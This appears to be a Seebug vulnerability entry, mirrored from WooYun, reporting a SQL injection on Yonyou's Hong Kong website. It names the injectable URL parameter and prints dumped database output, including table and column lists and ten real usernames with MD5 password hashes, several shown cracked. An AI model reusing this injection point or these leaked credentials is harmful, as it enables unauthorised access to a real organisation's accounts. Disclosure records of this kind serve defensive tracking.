用友香港官网存在注入导致帐号密码泄漏

关注 0

基本字段

漏洞编号：: SSV-93316

披露/发现时间：: 2015-01-14

提交时间：: 2015-01-14

漏洞等级：

漏洞类别：: 其他类型

影响组件：: YonYou

漏洞作者：: im503

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-091449

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：注入点：www.yonyou.com.hk/new/download_view.php?uid=4 ### 详细说明： [<img src="https://images.seebug.org/upload/201501/12181958597ff0ae56628d98907dfebf87c25e39.png" alt="you.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12181958597ff0ae56628d98907dfebf87c25e39.png) 2.数据库：db1007112_ufida中39个表 Database: db1007112_ufida [39 tables] +-------------------------+ | admin_log | | adpic | | app_cat | | app_company | | app_file | | app_fileImage | | app_fileItem | | app_log | | app_login | | app_partner | | app_staff | | banner | | banner_2013 | | banner_home_2013 | | content_2013 | | content_other_2013 | | content_sub_2013 | | down_file | | downform | | downform_2013 | | download_2013 | | downlog | | downone | | guestbook | | info | | menu | | onepage | | qikan | | qksort | | resources_download_2013 | | resources_menu_2013 | | sessions | | sort | | stats | | support_2013 | | tongji | | userlog | | users | | video | +-------------------------+ 3.用户表中12个列，Table: users [12 columns] +-------------+---------------------+ | Column | Type | +-------------+---------------------+ | action_list | text | | create_time | datetime | | creater | varchar(32) | | email | varchar(60) | | nav_list | text | | password | varchar(32) | | phone | varchar(11) | | status | tinyint(1) unsigned | | tel | varchar(11) | | true_name | varchar(60) | | users_id | tinyint(6) unsigned | | users_name | varchar(60) | +-------------+---------------------+ ### 漏洞证明： Table: users [10 entries] +------------+---------------------------------------------+ | users_name | password | +------------+---------------------------------------------+ | admin | 7bd90338e9640b6707ed8689a4bd929a | | howard | dc5ab2b32d9d78045215922409541ed7 (howard) | | lawrence | e02d90ea127f923d273786d055b6208e (lawrence) | | tianye | 4ebc55777a60faaaf170c00f16a4b64e | | louis | 777cadc280bb23ebea268ded98338c39 (louis) | | andy | da41bceff97b1cf96078ffb249b3d66e (andy) | | jessica | aae039d6aa239cfc121357a825210fa3 (jessica) | | johnny | f4eb27cea7255cea4d1ffabf593372e8 (johnny) | | liudong | 505a17b64f7e6f72bbc494338a7a1764 | | imadmin | cf0ff09ef02ae82a9e660e768de567e3 | +------------+---------------------------------------------+

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-091449

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

暂无评论

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负